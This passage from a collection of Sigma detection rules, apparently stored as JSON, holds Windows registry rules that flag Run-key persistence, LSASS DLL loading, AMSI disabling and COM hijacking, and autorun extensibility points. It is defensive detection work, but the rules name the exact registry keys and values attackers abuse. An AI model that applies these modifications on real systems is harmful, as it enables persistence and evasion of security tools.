    "content": "title: Suspicious Run Key from Download\nid: 9c5037d1-c568-49b3-88c7-9846a5bdc2be\nstatus: test\ndescription: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories\nreferences:\n    - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)\ndate: 2019-10-01\nmodified: 2025-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\AppData\\Local\\Packages\\Microsoft.Outlook_'\n            - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet Files\\Content.Outlook\\'\n            - '\\Local Settings\\Temporary Internet Files\\'\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n    condition: selection\nfalsepositives:\n    - Software installers downloaded and used by users\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml",
    "content": "title: DLL Load via LSASS\nid: b3503044-60ce-4bf4-bbcb-e3db98788823\nstatus: test\ndescription: Detects a method to load DLL via LSASS process using an undocumented Registry key\nreferences:\n    - https://blog.xpnsec.com/exploring-mimikatz-part-1/\n    - https://twitter.com/SBousseaden/status/1183745981189427200\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-16\nmodified: 2022-04-21\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1547.008\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt'\n            - '\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt'\n    filter_domain_controller:\n        Image: 'C:\\Windows\\system32\\lsass.exe'\n        Details:\n            - '%%systemroot%%\\system32\\ntdsa.dll'\n            - '%%systemroot%%\\system32\\lsadb.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml",
    "content": "title: Suspicious Camera and Microphone Access\nid: 62120148-6b7a-42be-8b91-271c04e281a3\nstatus: test\ndescription: Detects Processes accessing the camera and microphone from suspicious folder\nreferences:\n    - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nauthor: Den Iuzvyk\ndate: 2020-06-07\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1125\n    - attack.t1123\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|contains|all:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\'\n            - '\\NonPackaged'\n    selection_2:\n        TargetObject|contains:\n            - microphone\n            - webcam\n    selection_3:\n        TargetObject|contains:\n            - ':#Windows#Temp#'\n            - ':#$Recycle.bin#'\n            - ':#Temp#'\n            - ':#Users#Public#'\n            - ':#Users#Default#'\n            - ':#Users#Desktop#'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely, there could be conferencing software running from a Temp folder accessing the devices\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_susp_process_registry_modification.yml",
    "content": "title: Registry Tampering by Potentially Suspicious Processes\nid: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\nrelated:\n    - id: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\n      type: similar\n    - id: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\n    These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\n    without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\nreferences:\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-08-13\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            # Add more suspicious processes\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    condition: selection\nfalsepositives:\n    - Some legitimate admin or install scripts may use these processes for registry modifications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml",
    "content": "title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback\nid: 4d431012-2ab5-4db7-a84e-b29809da2172\nstatus: test\ndescription: Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml",
    "content": "title: Registry Persistence via Service in Safe Mode\nid: 1547e27c-3974-43e2-a7d7-7f484fb928ec\nstatus: test\ndescription: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network\nauthor: frack113\ndate: 2022-04-04\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\SafeBoot\\Minimal\\'\n            - '\\Control\\SafeBoot\\Network\\'\n        TargetObject|endswith: '\\(Default)'\n        Details: 'Service'\n    filter_optional_sophos:\n        Image: 'C:\\WINDOWS\\system32\\msiexec.exe'\n        TargetObject|endswith:\n            - '\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\SAVService\\(Default)'\n    filter_optional_mbamservice:\n        Image|endswith: '\\MBAMInstallerService.exe'\n        TargetObject|endswith: '\\MBAMService\\(Default)'\n        Details: 'Service'\n    filter_optional_hexnode:\n        Image: 'C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n        TargetObject|endswith:\n            - '\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)'\n            - '\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)'\n        Details: 'Service'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows Add Registry Value to Load Service in Safe Mode without Network\n      technique: T1112\n      atomic_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5\n    - type: atomic-red-team\n      name: Windows Add Registry Value to Load Service in Safe Mode with Network\n      technique: T1112\n      atomic_guid: c173c948-65e5-499c-afbe-433722ed5bd4\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_add_port_monitor.yml",
    "content": "title: Add Port Monitor Persistence in Registry\nid: 944e8941-f6f6-4ee8-ac05-1c224e923c0e\nstatus: test\ndescription: |\n    Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\n    A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md\nauthor: frack113\ndate: 2021-12-30\nmodified: 2024-03-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Control\\Print\\Monitors\\'\n        Details|endswith: '.dll'\n    filter_optional_cutepdf:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|contains: '\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver'\n        Details: 'cpwmon64_v40.dll'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_monvnc:\n        TargetObject|contains: '\\Control\\Print\\Monitors\\MONVNC\\Driver'\n    filter_optional_vnc:\n        TargetObject|contains|all:\n            - 'Control\\Print\\Environments\\'\n            - '\\Drivers\\'\n            - '\\VNC Printer'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Add Port Monitor persistence in Registry\n      technique: T1547.010\n      atomic_guid: d34ef297-f178-4462-871e-9ce618d44e50\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml",
    "content": "title: Add Debugger Entry To AeDebug For Persistence\nid: 092af964-4233-4373-b4ba-d86ea2890288\nstatus: test\ndescription: Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes\nreferences:\n    - https://persistence-info.github.io/Data/aedebug.html\n    - https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n        Details|endswith: '.dll'\n    filter:\n        Details: '\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of the key to setup a debugger. Which is often the case on developers machines\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml",
    "content": "title: Allow RDP Remote Assistance Feature\nid: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b\nstatus: test\ndescription: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Legitimate use of the feature (alerts should be investigated either way)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Allow RDP Remote Assistance Feature\n      technique: T1112\n      atomic_guid: 86677d0e-0b5e-4a2b-b302-454175f9aa9e\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml",
    "content": "title: Potential AMSI COM Server Hijacking\nid: 160d2780-31f7-4922-8b3a-efce30e63e96\nstatus: test\ndescription: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless\nreferences:\n    - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)'\n    filter:\n        Details: '%windir%\\system32\\amsi.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_amsi_disable.yml",
    "content": "title: AMSI Disabled via Registry Modification\nid: aa37cbb0-da36-42cb-a90f-fdf216fc7467\nrelated:\n    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.\n    Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.\n    Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.\nreferences:\n    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n    - https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.006\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Create AMSIEnable Reg Key\n      technique: T1562.001\n      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml",
    "content": "title: Classes Autorun Keys Modification\nid: 9df5f547-c86a-433e-b533-f2794357e242\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_classes_base:\n        TargetObject|contains: '\\Software\\Classes'\n    selection_classes_target:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\Shellex\\ColumnHandlers'\n            - '\\Filter'\n            - '\\Exefile\\Shell\\Open\\Command\\(Default)'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\.exe'\n            - '\\.cmd'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    filter_main_drivers:\n        Image: 'C:\\Windows\\System32\\drvinst.exe'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_svchost:\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n        # If more targets are found from \"svchost\". Please exclude the whole image\n        TargetObject|contains: '\\lnkfile\\shellex\\ContextMenuHandlers\\'\n    filter_optional_msoffice:\n        Details: '{807583E5-5146-11D5-A672-00B0D022E945}'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml",
    "content": "title: Common Autorun Keys Modification\nid: f59c3faf-50f3-464b-9f4c-1b67ab512d99\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart'\n            - '\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect'\n            - '\\SYSTEM\\Setup\\CmdLine'\n            - '\\Software\\Microsoft\\Ctf\\LangBarAddin'\n            - '\\Software\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Classes\\Protocols\\Handler'\n            - '\\SOFTWARE\\Classes\\Protocols\\Filter'\n            - '\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)'\n            - '\\Environment\\UserInitMprLogonScript'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe'\n            - '\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks'\n            - '\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components'\n            - '\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32'\n            - '\\Control Panel\\Desktop\\Scrnsave.exe'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_optional_msoffice:\n        - TargetObject|contains:\n              - '\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler\\'\n              - '\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler\\'\n        - Details:\n              - '{314111c7-a502-11d2-bbca-00c04f8ec294}'\n              - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}'\n              - '{42089D2D-912D-4018-9087-2B87803E93FB}'\n              - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}'\n              - '{807583E5-5146-11D5-A672-00B0D022E945}'\n    filter_optional_chrome:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}'\n    filter_optional_edge:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}'\n    filter_optional_IE:\n        TargetObject|contains: '\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}'\n    filter_optional_integrator:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_optional_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml",
    "content": "title: CurrentControlSet Autorun Keys Modification\nid: f674e36a-4b91-431e-8aef-f8a96c2aca35\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    system_control_base:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control'\n    system_control_keys:\n        TargetObject|contains:\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram'\n            - '\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n            - '\\SecurityProviders\\SecurityProviders'\n            - '\\SafeBoot\\AlternateShell'\n            - '\\Print\\Providers'\n            - '\\Print\\Monitors'\n            - '\\NetworkProvider\\Order'\n            - '\\Lsa\\Notification Packages'\n            - '\\Lsa\\Authentication Packages'\n            - '\\BootVerificationProgram\\ImagePath'\n    filter_empty:\n        Details: '(Empty)'\n    filter_cutepdf:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|contains: '\\Print\\Monitors\\CutePDF Writer Monitor'\n        Details:\n            - 'cpwmon64_v40.dll'\n            - 'CutePDF Writer'\n    filter_onenote:\n        Image: C:\\Windows\\System32\\spoolsv.exe\n        TargetObject|contains: 'Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        TargetObject|endswith: '\\NetworkProvider\\Order\\ProviderOrder'\n    filter_realvnc:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|endswith: '\\Print\\Monitors\\MONVNC\\Driver'\n        Details: 'VNCpm.dll'\n    condition: all of system_control_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml",
    "content": "title: CurrentVersion Autorun Keys Modification\nid: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'\n    selection_current_version_keys:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run\\'\n            - '\\RunOnce\\'\n            - '\\RunOnceEx\\'\n            - '\\RunServices\\'\n            - '\\RunServicesOnce\\'\n            - '\\Policies\\System\\Shell'\n            - '\\Policies\\Explorer\\Run'\n            - '\\Group Policy\\Scripts\\Startup'\n            - '\\Group Policy\\Scripts\\Shutdown'\n            - '\\Group Policy\\Scripts\\Logon'\n            - '\\Group Policy\\Scripts\\Logoff'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n            - '\\Authentication\\PLAP Providers'\n            - '\\Authentication\\Credential Providers'\n            - '\\Authentication\\Credential Provider Filters'\n    filter_main_generic_all:\n        - Details: '(Empty)'\n        - TargetObject|endswith: '\\NgcFirst\\ConsecutiveSwitchCount'\n        - Image|endswith:\n              - '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe' # C:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\n              - '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n              - '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        - Image:\n              - 'C:\\WINDOWS\\system32\\devicecensus.exe'\n              - 'C:\\Windows\\system32\\winsat.exe'\n              - 'C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe'\n              - 'C:\\Program Files\\Everything\\Everything.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_main_null:\n        Details: null\n    filter_main_logonui:\n        Image: 'C:\\Windows\\system32\\LogonUI.exe'\n        TargetObject|contains:\n            - '\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\'  # PIN\n            - '\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}\\'  # fingerprint\n            - '\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\'  # facial recognizion\n            - '\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\'  # Trusted 